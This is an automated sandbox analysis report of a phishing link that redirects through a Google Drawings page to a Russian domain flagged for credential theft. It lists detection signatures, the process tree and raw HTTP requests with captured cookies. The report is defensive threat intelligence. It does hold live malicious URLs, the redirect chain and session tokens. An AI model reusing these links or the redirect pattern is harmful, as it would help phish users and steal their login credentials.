Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1

Overview

General Information

Sample URL:http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1
Analysis ID:1577107
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected suspicious Javascript
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6728 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1972,i,10070688419523439903,9066158452006495313,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6516 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://dva.dgkifyron.ru/ncn6/Avira URL Cloud: Label: phishing
Source: https://dva.dgkifyron.ru/favicon.icoAvira URL Cloud: Label: malware
Source: https://gbd6fcynuxoa94bi5sdz5iglgosyprx97stbocqy8uuifnvrpgcdczvn4nsr.birsbunh.ru/evkUpQeWjmUMAENOBwgNyesdolyYbjYBUfCMNKJEWIIGMENMXFFGRKPUKTIRPTWKAvira URL Cloud: Label: malware

Phishing

barindex
Source: 0.12.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://dva.dgkifyron.ru/ncn6/#s... This script exhibits several high-risk behaviors, including disabling common developer tools and keyboard shortcuts, as well as redirecting the user to an external domain. The use of `debugger` statements and interval-based checks for performance timing suggest an attempt to detect and potentially bypass security measures. Overall, this script demonstrates a high level of malicious intent and should be considered a significant security risk.
Source: https://www.office.com/HTTP Parser: Title: Login | Microsoft 365 does not match URL
Source: https://dva.dgkifyron.ru/ncn6/#sHTTP Parser: No favicon
Source: https://www.office.com/HTTP Parser: No <meta name="author".. found
Source: https://www.office.com/HTTP Parser: No <meta name="copyright".. found
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1 HTTP/1.1Host: docs.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/drawings/client/css/2711563905-preview_css_ltr.css HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=bd20F08T1lo0pJWzF4cXwN7lvaVTKd5GII5jnqWT8zGK8hczuK9dlMwXBz2ubkMzIW1ieuVMp0GD4YWcN1fiAbwdVwShhRHtZ4nvfTsVLx3wE3zVQ60wvcahxY_J6ywEi_agrvZnK-NxQNQNoVQVxGWED3MM51RA-HGGbXxKWhCJh0LKHRofNQQ
Source: global trafficHTTP traffic detected: GET /static/drawings/client/js/750391780-preview_integrated_core_integrated.js HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=bd20F08T1lo0pJWzF4cXwN7lvaVTKd5GII5jnqWT8zGK8hczuK9dlMwXBz2ubkMzIW1ieuVMp0GD4YWcN1fiAbwdVwShhRHtZ4nvfTsVLx3wE3zVQ60wvcahxY_J6ywEi_agrvZnK-NxQNQNoVQVxGWED3MM51RA-HGGbXxKWhCJh0LKHRofNQQ
Source: global trafficHTTP traffic detected: GET /static/drawings/client/js/750391780-preview_integrated_core_integrated.js HTTP/1.1Host: docs.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=bd20F08T1lo0pJWzF4cXwN7lvaVTKd5GII5jnqWT8zGK8hczuK9dlMwXBz2ubkMzIW1ieuVMp0GD4YWcN1fiAbwdVwShhRHtZ4nvfTsVLx3wE3zVQ60wvcahxY_J6ywEi_agrvZnK-NxQNQNoVQVxGWED3MM51RA-HGGbXxKWhCJh0LKHRofNQQ
Source: global trafficHTTP traffic detected: GET /drawingsz/AHiSRb2vRX9yRkhsvHGfazZ72MIvhHTEE29fzvFIJ2wLbLb48Na1ZuKYqByE7N05I4x14kPzvPGpPC-E1sHLmtMPSMYYZFjYQ1a2lQEOxRYu2NvG2foDaSN72Eozfhv4l2hEccw?key=psfCeKuvwgTVf-bOGgtgC0jY HTTP/1.1Host: lh7-rt.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://docs.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://docs.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /drawingsz/AHiSRb2vRX9yRkhsvHGfazZ72MIvhHTEE29fzvFIJ2wLbLb48Na1ZuKYqByE7N05I4x14kPzvPGpPC-E1sHLmtMPSMYYZFjYQ1a2lQEOxRYu2NvG2foDaSN72Eozfhv4l2hEccw?key=psfCeKuvwgTVf-bOGgtgC0jY HTTP/1.1Host: lh7-rt.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ncn6/ HTTP/1.1Host: dva.dgkifyron.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://docs.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dva.dgkifyron.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dva.dgkifyron.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dva.dgkifyron.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://dva.dgkifyron.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f3b461238074211&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dva.dgkifyron.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dva.dgkifyron.ru/ncn6/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlRocEtJRzNGOFVMdGtYTFBVNzNtMHc9PSIsInZhbHVlIjoiR0pOZGxpUFU3NmprVC8rQ0IzbHoyOG11dGlYY2VpL3NWc3pXY1B1SldtczVRRW1NSXRHNlA5WkVEUW95SUFBQ3NuaHpxYnh6QUptRDU2dHJMc0lsT2NVeUdHWlRoeTRscmlzQWpiMGYwd3hKblNCSTlNWHpjRHJGVi9jYWNVWUoiLCJtYWMiOiJkOTRhMzgyNDFlNzc3MTk4MDVkYWRlZjQzNmIxZWZlY2VjNmQ1Mzc2MzBkZDY1NjZiODU5MTFkZTI4MWM4MGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjRvTi9YUGJaNHhuYjBKbWhKNFRBd2c9PSIsInZhbHVlIjoiR0ppcWZIYk9TUU1XbjY1dGwyUkF1RnJQa1lCUHFjZjlSQkNOU2U2ZFJQaXh4anNTNytxZlBiclJ6RnhRSW5lUVpKS1pBZ2JyWnc5QlpzdWdSb3FKK3EzMHdLaTZ4WEtrWGllcC85d2RjZDZnYko2ZDhuaVJSa3poM1lMMmNLcGQiLCJtYWMiOiI0YWM0NWE4ZWIyNTk1Y2E5MmM3Y2Y2NjZmZTU1MTEwMmZkMmE0MzA5OTJkNTNkYmFjNjVkMWE0YzZjZGEwYmVlIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f3b461238074211&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/125857172:1734480993:OfdE6imy-GzCLV7tV1vzGVc07L0hYO19BOItnccvC5w/8f3b461238074211/ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f3b461238074211/1734484236191/3d49fbda9781759e22ef658622937e3dc0dc5a7ee0fc517e38e5eca96346b40f/tXmkPobUkDYfmwy HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f3b461238074211/1734484236191/2ItuRd0ocevcQB0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f3b461238074211/1734484236191/2ItuRd0ocevcQB0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/125857172:1734480993:OfdE6imy-GzCLV7tV1vzGVc07L0hYO19BOItnccvC5w/8f3b461238074211/ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/125857172:1734480993:OfdE6imy-GzCLV7tV1vzGVc07L0hYO19BOItnccvC5w/8f3b461238074211/ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
